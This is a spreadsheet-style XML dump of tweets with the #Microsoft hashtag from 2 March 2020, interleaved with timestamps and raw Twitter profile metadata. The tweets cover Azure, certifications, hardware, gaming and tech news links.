    <t>"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognize and explore in order to achieve the same-targeted levels of power, ethics, and trust: https://t.co/30tGkrgrDy</t>
  </si>
  <si>
    <t>{'id': 6402842, 'id_str': '6402842', 'name': 'Vinod Kumar M (SQL)', 'screen_name': 'vinodk_sql', 'location': 'Singapore', 'description': 'Passion with Data, Author, Speaker, Blogger and a learning student. Cloud Solutions Architect - APAC', 'url': 'https://t.co/U3rLkrDfnk', 'entities': {'url': {'urls': [{'url': 'https://t.co/U3rLkrDfnk', 'expanded_url': 'http://blogs.ExtremeExperts.com/', 'display_url': 'blogs.ExtremeExperts.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9636, 'friends_count': 6609, 'listed_count': 329, 'created_at': 'Tue May 29 04:19:18 +0000 2007', 'favourites_count': 594, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25934,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'http://pbs.twimg.com/profile_images/1288789749/192293_199237096776206_194254377274478_608790_6751262_o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1288789749/192293_199237096776206_194254377274478_608790_6751262_o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6402842/1374477652',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</si>
  <si>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05:37:51 +0000 2020</t>
  </si>
  <si>
    <t>Do you knowThere are over 498,155 websites that use  RoR. The major industry heavyweights that use RoR include- #Microsoft, GitHub, Bloomberg, Netflix, Twitch, and Airbnb. Be a part of the revolution, and develop an aesthetic #WebApplication with #RoR!
  https://t.co/RETIQ9TKbM https://t.co/ddGDrp8N2x</t>
  </si>
  <si>
    <t>{'id': 461762658, 'id_str': '461762658', 'name': 'Seasia', 'screen_name': 'Seasiainfotech', 'location': 'USA, Australia, India, Canada', 'description': 'CMMI5 Certified Software Organization providing #MobileAppDevelopment #WebDevelopment #WebDesign #DigitalMarketing and #QA services Worldwide.', 'url': 'https://t.co/8LTqxMP4yy', 'entities': {'url': {'urls': [{'url': 'https://t.co/8LTqxMP4yy', 'expanded_url': 'http://www.seasiainfotech.com', 'display_url': 'seasiainfotech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1432, 'friends_count': 1689, 'listed_count': 106, 'created_at': 'Thu Jan 12 04:53:20 +0000 2012', 'favourites_count': 3593, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3078,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'http://pbs.twimg.com/profile_images/1213075119490269184/Q-2qDKzQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213075119490269184/Q-2qDKzQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/461762658/1577345631', 'profile_link_color': 'E81C4F',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</si>
  <si>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Mon Mar 02 05:35:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Sudoku stealthily rolls out on #iOS https://t.co/bCGptB5Y3Q</t>
  </si>
  <si>
    <t>Mon Mar 02 05:34:50 +0000 2020</t>
  </si>
  <si>
    <t>Video from Microsoft Azure YouTube page, learn about self-service password reset and how it benefits IT staff and employees, link below.
#Microsoft #Azure #Cloud #CloudComputing #AzureActiveDirectory
https://t.co/dam9FWmMeV</t>
  </si>
  <si>
    <t>Mon Mar 02 05:32:18 +0000 2020</t>
  </si>
  <si>
    <t>Meet Namya Joshi, the 13-YO Whiz Kid Who Left Satya Nadella Impressed!
#MondayMotivation #knowledge #impressive #goals #smart #Microsoft #India #innovation #girl @thebetterindia @UN_Women @satyanadella @Microsoft 
https://t.co/EqKXcpewRr</t>
  </si>
  <si>
    <t>{'id': 1028150778312241153, 'id_str': '1028150778312241153', 'name': 'Goa Livelihoods Forum', 'screen_name': 'GoaLivelihoods', 'location': 'à¤—à¥‹à¤µà¤¾, à¤­à¤¾à¤°à¤¤', 'description': 'Hashtag #GoaLivelihoods #GLF #Goa', 'url': 'https://t.co/BnFbPAZDyd', 'entities': {'url': {'urls': [{'url': 'https://t.co/BnFbPAZDyd', 'expanded_url': 'http://www.goalivelihoods.org', 'display_url': 'goalivelihoods.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 339, 'friends_count': 117, 'listed_count': 0, 'created_at': 'Sat Aug 11 05:27:02 +0000 2018', 'favourites_count': 1416, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2651, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151907088701853696/wQWjOnf0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151907088701853696/wQWjOnf0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1028150778312241153/1566546899',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</si>
  <si>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05:20:04 +0000 2020</t>
  </si>
  <si>
    <t>How one man could have flooded your phone with #Microsoft #spam - #cybersecurity https://t.co/PIqnuI4JFG</t>
  </si>
  <si>
    <t>Mon Mar 02 05:18:27 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Interactive Python Dashboards with Plotly and Dash #udemycoupon -&amp;gt; https://t.co/4rNQvHr1Td
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Mon Mar 02 05:17:12 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 05:13:00 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook app for Windows 10 removed from #Microsoft Store. https://t.co/rW4PRCMHbC</t>
  </si>
  <si>
    <t>{'id': 21227318, 'id_str': '21227318', 'name': 'Mick Gill', 'screen_name': 'Mick_Gill', 'location': 'Bolton Greater Manchester UK', 'description': 'Irish ExPat interested in Technology, Internet, Entertainment, Social Media, Lifestyle, News &amp; Opinion.Â© Instagram: mickgill', 'url': 'https://t.co/LESVoZo1Kf', 'entities': {'url': {'urls': [{'url': 'https://t.co/LESVoZo1Kf', 'expanded_url': 'http://mickgill.blogspot.com', 'display_url': 'mickgill.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8904, 'friends_count': 8259, 'listed_count': 348, 'created_at': 'Wed Feb 18 18:52:50 +0000 2009', 'favourites_count': 1738, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68433, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '006600', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218966222273961984/N68M9r2o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218966222273961984/N68M9r2o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21227318/1472829453', 'profile_link_color': '1E8449', 'profile_sidebar_border_color': 'FF4D00', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '575757', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 05:08:15 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to use the new #AzureFiles with #ActiveDirectory #Authentication with #FSLogix &amp;amp; #WindowsVirtualDesktop today at #TheAzureAcademy
https://t.co/0j2mY7Z1FD
#azure #virtualmachines #wvd #msignitethetour #microsoft #vdi #citrix #azuretipsandtricks #learnazure #fasttrack</t>
  </si>
  <si>
    <t>{'id': 63201618, 'id_str': '63201618', 'name': 'Dean Cefola', 'screen_name': 'MSAzureAcademy', 'location': 'Pennsylvania, USA', 'description': '#TheAzureAcademy                               Sr. Azure FastTrack Engineer', 'url': 'https://t.co/Hi1nNtMJNC', 'entities': {'url': {'urls': [{'url': 'https://t.co/Hi1nNtMJNC', 'expanded_url': 'http://www.youtube.com/AzureAcademy', 'display_url': 'youtube.com/AzureAcademy', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 499, 'friends_count': 410, 'listed_count': 19, 'created_at': 'Wed Aug 05 17:50:07 +0000 2009', 'favourites_count': 5353, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 697,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'http://pbs.twimg.com/profile_images/1232541728265162752/HgptiSfC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232541728265162752/HgptiSfC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/63201618/1582695870',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</si>
  <si>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05:08:11 +0000 2020</t>
  </si>
  <si>
    <t>Even More @Microsoft Course Completions - @glenbenjamin @LANINFOTECH 
Windows Server and SQL Server End of Support Options
Understanding Microsoft's Intelligent Communication
Microsoft 365 Business Deployment for SMB's
Modern Pricing Changes
#windowsserver #laninfotech #microsoft https://t.co/JoX9vzYkc7</t>
  </si>
  <si>
    <t>Mon Mar 02 05:07:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers #5G Network Edge Compute Technology
 #iot #Microsoft #Azure #MicrosoftAzure
https://t.co/E9XbXrYlen</t>
  </si>
  <si>
    <t>Mon Mar 02 05:05:10 +0000 2020</t>
  </si>
  <si>
    <t>#Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/Y36LbaOTzc #cloud #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 05:05:02 +0000 2020</t>
  </si>
  <si>
    <t>Monday 4:59am &amp;amp; I'm on the train heading down south to talk Dynamics 365 with a partner. Getting them on their Dynamics journey. Enabling them to transact with zero investment but with ALL the benefits!! @IMCloud_UK @IngramCloud
#IngramMicroCloud #MSDyn365 #Microsoft #Dynamics365 https://t.co/SX4Pqvc3r0</t>
  </si>
  <si>
    <t>Mon Mar 02 05:02:41 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Warning Is A #Harbinger Of #Coronavirus Impact On Business And The #Economy via @forbes https://t.co/xZhS42gbwX</t>
  </si>
  <si>
    <t>{'id': 17731594, 'id_str': '17731594', 'name': 'Ramkumar', 'screen_name': 'nocturnalknight', 'location': 'Chennai, India', 'description': 'Entrepreneur, Open-Source Evangelist, AI &amp; Robotics Researcher. Amateur Aerospace Observer. Loves travel &amp; Cooking.', 'url': 'https://t.co/e5tetjDgS1', 'entities': {'url': {'urls': [{'url': 'https://t.co/e5tetjDgS1', 'expanded_url': 'http://www.nocturnalknight.com', 'display_url': 'nocturnalknight.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 470, 'friends_count': 744, 'listed_count': 261, 'created_at': 'Sat Nov 29 09:37:59 +0000 2008', 'favourites_count': 363, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11521,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'http://pbs.twimg.com/profile_images/821721309835038721/a227EfDX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/821721309835038721/a227EfDX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17731594/1470675038',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</si>
  <si>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Mon Mar 02 05:00:51 +0000 2020</t>
  </si>
  <si>
    <t>Exam #AZ500: #Microsoft #Azure #Security Technologies Preparation #Notes #PrepNotes
Used #Resources:
Azure-AZ-500-Study-Guide by @AzureMentor https://t.co/7TKhKFXRWd
AZ-500-Azure-Security Labs by #MicrosoftLearning https://t.co/dxpH7M9tgI https://t.co/njr23eyWXJ</t>
  </si>
  <si>
    <t>{'id': 4128549219, 'id_str': '4128549219', 'name': 'Andy Svintsitsky', 'screen_name': 'AndySvints', 'location': 'Toms River, NJ', 'description': '#IT Enthusiast, #PowerShell Toolmaker, Lovely #husband &amp; #father; #CISSP, #CCSP', 'url': 'https://t.co/xWUCXuPAq0', 'entities': {'url': {'urls': [{'url': 'https://t.co/xWUCXuPAq0', 'expanded_url': 'http://andysvints.com', 'display_url': 'andysvints.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 250, 'friends_count': 384, 'listed_count': 5, 'created_at': 'Fri Nov 06 18:16:00 +0000 2015', 'favourites_count': 627, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1596,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'http://pbs.twimg.com/profile_images/684446457068412928/HCBqZwxY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/684446457068412928/HCBqZwxY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4128549219/1569901486',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</si>
  <si>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05:00:03 +0000 2020</t>
  </si>
  <si>
    <t>.@Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. https://t.co/n4rMrIDEyQ</t>
  </si>
  <si>
    <t>Azure Sentinel Insecure Protocols Workbook Implementation Guide
https://t.co/6zt2yko1lr 
#Microsoft #Azure #sentinel #protocols #workbook #analytics #configuration #identity #security #issquared</t>
  </si>
  <si>
    <t>Basic Auth and Exchange Online  February 2020 Update
 https://t.co/OOgW8Sfted 
#Microsoft #techcommunity #microsoftexchange #exchangeonline #cloud #authentication #azure #activedirectory #issquared https://t.co/QCwqc4T4VZ</t>
  </si>
  <si>
    <t>Mon Mar 02 05:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Concordance harmonizes ERP for healthy growth
https://t.co/o0eAYHmRu7 
#ERP #distributors #healthcare #tools #cio #Microsoft #data #cloud #database
#issquared</t>
  </si>
  <si>
    <t>Intro to SysInternals for Malware Analysis...
https://t.co/1AQcgnr1Z3
#Malware #cybersecurity #infosecurity #forensic #infosec #CyberAttack #security #sysinternals #microsoft https://t.co/3DfK4r6jPt</t>
  </si>
  <si>
    <t>{'id': 1172566386482339840, 'id_str': '1172566386482339840', 'name': 'John mash', 'screen_name': 'Techhelplistcom', 'location': 'Great Falls, MT ', 'description': "Formerly : provided malware and phishing IOCs for no reason. Currently : the worst part of someone else's industry. Punk By The Book.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Fri Sep 13 17:43:55 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 706, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1172567199283929089/u-JrSqcu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172567199283929089/u-JrSqcu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1172566386482339840/1568396833',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</si>
  <si>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04:58:55 +0000 2020</t>
  </si>
  <si>
    <t>Intro to SysInternals for Malware Analysis...
https://t.co/JUjX9L7iwG
#Malware #cybersecurity #infosecurity #forensic #infosec #CyberAttack #security #sysinternals #microsoft https://t.co/gnB4pA5ugB</t>
  </si>
  <si>
    <t>Mon Mar 02 04:54:01 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">#MondayMotivation Really surprised how efficient #Microsoft (@WindowsUK) #Win10 has become on the updates after being left for whole weekend done in seconds, almost as good as #Linux system but still have to restart the whole system </t>
  </si>
  <si>
    <t>{'id': 1240731954, 'id_str': '1240731954', 'name': 'Cambridge Online Learning Community', 'screen_name': 'Cambolc', 'location': 'Cambridge, UK', 'description': "Into #UniversalEducation #RaspberryPi  #lifelonglearning, #science, #hygge #MicrosoftTeams, retweet doesn't imply agreement, all opinions are our own!", 'url': 'https://t.co/pECtg36E7g', 'entities': {'url': {'urls': [{'url': 'https://t.co/pECtg36E7g', 'expanded_url': 'http://cambolc.co.uk', 'display_url': 'cambolc.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2511, 'friends_count': 4999, 'listed_count': 454, 'created_at': 'Mon Mar 04 07:17:53 +0000 2013', 'favourites_count': 6736, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16247,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'http://pbs.twimg.com/profile_images/3459624900/e651701929876e4dc6497b6508d3810e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3459624900/e651701929876e4dc6497b6508d3810e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1240731954/1474794796',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</si>
  <si>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04:51:01 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X vs Xbox One X  will it be worth the upgrade?. https://t.co/J8IbXwl1SY When you purchase through links on our site, we may earn an... #Microsoft #PS4 #PS4Pro #Sony #Xbox #XboxOneX #XboxSeriesX #games #incline #microsoft #microsofts #upgrade #xbox #xboxseries</t>
  </si>
  <si>
    <t>Mon Mar 02 04:50:17 +0000 2020</t>
  </si>
  <si>
    <t>I'm the one whose boobs your heart suffers. Has it not yet popped out of its chest?
https://t.co/CV68sj2jyp
#Saline County
 #microsoft #apple https://t.co/SR34pE9j74</t>
  </si>
  <si>
    <t>{'id': 1233400542287757313, 'id_str': '1233400542287757313', 'name': 'Tina Carter', 'screen_name': 'ocuthoeter', 'location': 'Ð¡ÑƒÑ€Ð³ÑƒÑ‚, Ð Ð¾ÑÑÐ¸Ñ', 'description': 'Since I met you', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Fri Feb 28 14:36:26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'http://pbs.twimg.com/profile_images/1233452634654334977/VcpUyiRv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233452634654334977/VcpUyiRv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233400542287757313/1582913083',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</si>
  <si>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04:44:38 +0000 2020</t>
  </si>
  <si>
    <t>More than 40 exams and 15 Product-Based Certificates scheduled to retire on 30,June 2020!  
 If youre working towards an MCSA, MCSD, or MCSE certification, youll want to pass all required exams before they retire. 
https://t.co/5xhv7SI4AY
@devoworx @deBUGCommunity #Microsoft https://t.co/ms3xxiB2Bl</t>
  </si>
  <si>
    <t>{'id': 848088558439190528, 'id_str': '848088558439190528', 'name': 'Mohamed  El-Qassas', 'screen_name': 'MelQassas', 'location': 'Riyadh', 'description': 'Microsoft MVP | C# Corner MVP | SharePoint StackExchange Moderator | TechNet Wiki Judge | Blogger and Senior Technical Consultant (SharePoint &amp; EPM).', 'url': 'https://t.co/gU87sAE7GK', 'entities': {'url': {'urls': [{'url': 'https://t.co/gU87sAE7GK', 'expanded_url': 'https://devoworx.com', 'display_url': 'devoworx.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 66, 'listed_count': 4, 'created_at': 'Sat Apr 01 08:24:03 +0000 2017', 'favourites_count': 708, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 488, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1117061499967688704/IAUZKYGL_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117061499967688704/IAUZKYGL_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/848088558439190528/1553388844',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</si>
  <si>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04:42:16 +0000 2020</t>
  </si>
  <si>
    <t>It's incredibly great to be free of #Microsoft, but #Linux has its own obvious limitations incl w the open source model. MS can put man-centuries into something, open source can't. And, they fracture that: dozens of weak projects instead of collaborating to make one good.</t>
  </si>
  <si>
    <t>{'id': 1345219692, 'id_str': '1345219692', 'name': '24AheadDotCom', 'screen_name': '24AheadDotCom_', 'location': 'Trump 2022 Campaign HQ, Christmastown, Christmas Autonomous Oblast, U.S. Christmas Islands', 'description': 'https://t.co/T9sFSvjsxz https://t.co/5SKAwh9z39 Stop amnesty: https://t.co/TMvfeaTngz Alt: @24AheadDotCom https://t.co/dW6mukg57O', 'url': 'http://t.co/b92hGug4Rq', 'entities': {'url': {'urls': [{'url': 'http://t.co/b92hGug4Rq', 'expanded_url': 'http://24ahead.com/', 'display_url': '24ahead.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/T9sFSvjsxz', 'expanded_url': 'http://24ahead.com/donate', 'display_url': '24ahead.com/donate', 'indices': [0, 23]}, {'url': 'https://t.co/5SKAwh9z39', 'expanded_url': 'https://www.reddit.com/r/Trump2/', 'display_url': 'reddit.com/r/Trump2/', 'indices': [24, 47]}, {'url': 'https://t.co/TMvfeaTngz', 'expanded_url': 'http://24ahead.com/stop-amnesty-challenge', 'display_url': '24ahead.com/stop-amnesty-câ€¦', 'indices': [62, 85]}, {'url': 'https://t.co/dW6mukg57O', 'expanded_url': 'https://gab.ai/24AheadDotCom', 'display_url': 'gab.ai/24AheadDotCom', 'indices': [106, 129]}]}}, 'protected': False, 'followers_count': 267, 'friends_count': 7, 'listed_count': 131, 'created_at': 'Thu Apr 11 20:32:56 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 61836,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/716447956027609088/Yx8Yo167_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/716447956027609088/Yx8Yo167_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1345219692/1516404680', 'profile_link_color': 'FF0000',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</si>
  <si>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Mon Mar 02 04:39:44 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of Microsoft Windows 10 Users
#cybersecurity #informationsecurity #networksecurity #informationtechnology #hacking #security #microsoft #windows #vulnerability #vaultinfosec #wevowyoursecurity #risk #extensions #websecurity
https://t.co/Icz7XPbaxh</t>
  </si>
  <si>
    <t>Mon Mar 02 04:35:03 +0000 2020</t>
  </si>
  <si>
    <t>What's new in power Bi - Februar Edition #powerBi #microsoft #reporting
https://t.co/GF2hLkCxQ7</t>
  </si>
  <si>
    <t>Mon Mar 02 04:33:52 +0000 2020</t>
  </si>
  <si>
    <t>I am a fan of hot laptops #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 04:32:50 +0000 2020</t>
  </si>
  <si>
    <t>Check out some fantastic #PAX pictures from this weekend from our own Brewcaster Chris! Comment with any questions about the events or showings!
#PAXEast #Bethesda #AnimalCrossing #Nintendo #fallout #DOOM #FinalFantasy #Playstation #ps #xbox #Microsoft #NintendoSwitch #podcast https://t.co/TjVQ37TZhe</t>
  </si>
  <si>
    <t>{'id': 835937047777009664, 'id_str': '835937047777009664', 'name': 'The Game Brew Podcast', 'screen_name': 'TheGameBrew', 'location': '', 'description': 'Tap into a hearty brew with the Game Brew Crew! Enjoy discussions about video games, and sometimes about beer! #PodernFamily', 'url': 'https://t.co/0FfqqxfhJx', 'entities': {'url': {'urls': [{'url': 'https://t.co/0FfqqxfhJx', 'expanded_url': 'http://thegamebrew.com', 'display_url': 'thegamebrew.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 250, 'friends_count': 451, 'listed_count': 2, 'created_at': 'Sun Feb 26 19:38:17 +0000 2017', 'favourites_count': 415, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 402,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'http://pbs.twimg.com/profile_images/876954068790509568/-jV09lq6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876954068790509568/-jV09lq6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/835937047777009664/1494379182',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</si>
  <si>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04:29:01 +0000 2020</t>
  </si>
  <si>
    <t>Kotii Reddy Saripalli Matric boy to Microsoft techie I Kotii Group Of Ventures I RECTV INFO
 #kotireddy #microsoft #matricboy #microsofttechie
WATCH FULL VIDEO https://t.co/6USefg4XsD https://t.co/04pv10LFmN</t>
  </si>
  <si>
    <t>{'id': 2620746085, 'id_str': '2620746085', 'name': 'rectvinfo', 'screen_name': 'rectvinfo', 'location': '', 'description': '', 'url': 'https://t.co/meSRfiuF8c', 'entities': {'url': {'urls': [{'url': 'https://t.co/meSRfiuF8c', 'expanded_url': 'http://www.rectvinfo.com', 'display_url': 'rectvinfo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 366, 'friends_count': 175, 'listed_count': 5, 'created_at': 'Sat Jul 12 06:20:39 +0000 2014', 'favourites_count': 212, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38886,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'http://pbs.twimg.com/profile_images/1205037509744324608/fZ-8mefm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205037509744324608/fZ-8mefm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2620746085/1576138486',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</si>
  <si>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04:28:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to #return to the #mobile market with Surface #Duo - https://t.co/yBB3hyDCuM</t>
  </si>
  <si>
    <t>{'id': 143562564, 'id_str': '143562564', 'name': 'ðŸ‡ºðŸ‡¸thesilentseawolf', 'screen_name': 'silentseawolf', 'location': 'SEAPORT1A', 'description': '#nowtrending #ai  #ar  #automation  #biotech   #COVIDãƒ¼19  #freespirit76   #iot  #kag2020   #springequinox032020  #STEP2020   #wormmoon030920  #vr', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10749, 'friends_count': 10377, 'listed_count': 590, 'created_at': 'Thu May 13 20:28:24 +0000 2010', 'favourites_count': 194073, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 191056, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '186EC4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2817082886/4febae9927297713321d9b995c651da8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2817082886/4febae9927297713321d9b995c651da8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/143562564/1581382500', 'profile_link_color': '1433BA', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'C0DFEC', 'profile_text_color': '0C0B17', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 04:26:38 +0000 2020</t>
  </si>
  <si>
    <t>#ubank outsources code to #microsoft #proprietarySoftware trap that denies access by people who are disabled https://t.co/piAWU6vyMZ see https://t.co/W7GW14PlLg</t>
  </si>
  <si>
    <t>Mon Mar 02 04:21:28 +0000 2020</t>
  </si>
  <si>
    <t>The #Facebook - #Microsoft  #Openwashing bandwagon, painting #Surveillance operations as "open" https://t.co/3BE2orHsAr #OCP</t>
  </si>
  <si>
    <t>Mon Mar 02 04:21:09 +0000 2020</t>
  </si>
  <si>
    <t>All my life I have been such an Apple fanboy I failed to see the innovations on the other side. The things Microsoft is doing is really incredible. The only way you can get a taste of future tech is to plant your feet in different camps. #Apple #Microsoft #Google</t>
  </si>
  <si>
    <t>{'id': 1044298062552813569, 'id_str': '1044298062552813569', 'name': 'Alexander Cuenin', 'screen_name': 'IAmCuenin', 'location': 'Highlands Ranch, CO', 'description': "I love film and TV. Video Editor for Hello Future Me, aspiring Illustrator, Writer and creator at Cuenin's Cove!", 'url': 'https://t.co/gx5ukwERVV', 'entities': {'url': {'urls': [{'url': 'https://t.co/gx5ukwERVV', 'expanded_url': 'http://www.youtube.com/CueninsCove', 'display_url': 'youtube.com/CueninsCove', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 82, 'friends_count': 318, 'listed_count': 0, 'created_at': 'Mon Sep 24 18:50:35 +0000 2018', 'favourites_count': 1623, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 495,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'http://pbs.twimg.com/profile_images/1218120817386475520/Pogr__do_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218120817386475520/Pogr__do_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1044298062552813569/1566204756',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</si>
  <si>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04:09:33 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations to all the new MVP's and those who got renewed their @MVPAward #MVPBuzz #Microsoft #Technical #Community</t>
  </si>
  <si>
